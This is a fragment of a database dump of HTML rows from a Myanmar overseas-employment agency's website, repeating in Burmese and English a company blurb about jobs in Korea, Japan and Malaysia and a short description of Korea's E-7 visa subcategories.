('activities', 0, 6, 21, 'en', 0, '<p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 6, 24, 'en', 0, '<p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 7, 12, 'en', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;text-align:start;\" dir=\"auto\">E-7 visa</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;text-align:start;\" dir=\"auto\">နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;text-align:start;\" dir=\"auto\">E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;text-align:start;\" dir=\"auto\">. E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;text-align:start;\" dir=\"auto\">. E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;text-align:start;\" dir=\"auto\">E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;text-align:start;\" dir=\"auto\">E-7 visa</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div class=\"text-align-justify\" style=\"font-family:inherit;text-align:start;\" dir=\"auto\">It\'s a special ability visa for foreign nationals. It\'s also divided into categories</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div class=\"text-align-justify\" style=\"font-family:inherit;text-align:start;\" dir=\"auto\">E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div class=\"text-align-justify\" style=\"font-family:inherit;text-align:start;\" dir=\"auto\">E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div class=\"text-align-justify\" style=\"font-family:inherit;text-align:start;\" dir=\"auto\">E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div class=\"text-align-justify\" style=\"font-family:inherit;text-align:start;\" dir=\"auto\">E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</div></div>', '', 'full_html'),
('activities', 0, 7, 46, 'en', 0, '<p>E-7 visa</p><p>နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</p><p>E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</p><p>E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</p><p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 117, 'en', 0, '<p>E-7 visa</p><p>နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</p><p>E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</p><p>E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</p><p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 117, 'ja', 0, '<p>E-7 visa</p><p>နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</p><p>E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</p><p>E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</p><p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 118, 'en', 0, '<p>E-7 visa</p><p>နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</p><p>E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</p><p>E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</p><p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 118, 'ja', 0, '<p>E-7 visa</p><p>နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</p><p>E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</p><p>E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</p><p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 118, 'ko', 0, '<p>E-7 visa</p><p>နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</p><p>E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</p><p>E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</p><p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 153, 'en', 0, '<p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 153, 'ja', 0, '<p>E-7 visa</p><p>နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</p><p>E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</p><p>E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</p><p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 153, 'ko', 0, '<p>E-7 visa</p><p>နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</p><p>E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</p><p>E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</p><p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
